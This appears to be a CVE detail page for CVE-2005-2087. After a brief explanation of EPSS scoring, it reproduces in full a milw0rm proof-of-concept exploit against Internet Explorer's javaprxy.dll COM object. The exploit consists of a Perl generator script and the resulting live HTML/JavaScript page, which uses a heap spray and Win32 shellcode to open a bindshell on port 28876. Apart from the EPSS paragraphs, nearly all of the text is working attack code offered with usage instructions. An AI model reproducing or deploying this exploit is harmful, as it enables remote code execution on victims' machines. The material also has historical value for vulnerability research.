CVE-2005-2087 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<!-- (update) frsirt updated the comments to reflect skylined's code + gpl. /str0ke Perl code is commented so people can test the vuln on their IE /str0ke #!/usr/bin/perl # ###################################################### # # Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched- # # Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com > # Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit # 01 July 2005 # # Description - http://www.frsirt.com/english/advisories/2005/0935 # Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx # sec-consult - http://www.sec-consult.com/184.html # # Solution : # Set Internet and Local intranet security zone settings to "High" or use # another browser until a patch is released. # # Tested on : # Internet Explorer 6 on Microsoft Windows XP SP2 # Internet Explorer 6 on Microsoft Windows XP SP1 # # Affected versions : # Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3 # Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 # Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1 # Internet Explorer 6 for Microsoft Windows XP Service Pack 2 # Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium) # Internet Explorer 6 for Microsoft Windows Server 2003 # Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1 # Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems # Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium # Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) # Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition # Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition # Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition # Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 # Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE # Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition # # Usage : perl iejavaprxyexploit.pl > mypage.html # ###################################################### # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License version 2, 1991 as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # A copy of the GNU General Public License can be found at: # http://www.gnu.org/licenses/gpl.html # or you can write to: # Free Software Foundation, Inc. # 59 Temple Place - Suite 330 # Boston, MA 02111-1307 # USA. # ###################################################### # header my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n"; # Win32 bindshell (port 28876) - SkyLined my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb". "%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea". "%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7". "%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b". "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64". "%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c". "%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe". "%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0". "%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050". "%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6". "%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650". "%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa". "%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656". "%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1". "%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353". "%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353". "%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe". "%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff". "%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n"; # Memory my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n". "headersize = 20;\n". "slackspace = headersize+shellcode.length\n". "while (bigblock.length<slackspace) bigblock+=bigblock;\n". "fillblock = bigblock.substring(0, slackspace);\n". "block = bigblock.substring(0, bigblock.length-slackspace);\n". "while(block.length+slackspace<0x40000) block = block+block+fillblock;\n". "memory = new Array();\n". "for (i=0;i<750;i++) memory[i] = block + shellcode;\n". "</SCRIPT>\n"; # javaprxy.dll my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # footer my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n". "Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n". "by the FrSIRT < http://www.frsirt.com >\n". "Solution - http://www.frsirt.com/english/advisories/2005/0935". "</body><script>location.reload();</script></html>"; # print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin print "$header $shellcode $code $footer"; --> <html><body> <SCRIPT language="javascript"> shellcode = unescape("%u4343"+"%u4343"+"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb"); bigblock = unescape("%u0D0D%u0D0D"); headersize = 20; slackspace = headersize+shellcode.length while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<750;i++) memory[i] = block + shellcode; </SCRIPT> <object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object> Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT < http://www.frsirt.com > Solution - http://www.frsirt.com/english/advisories/2005/0935</body><script>location.reload();</script></html> # milw0rm.com [2005-07-05]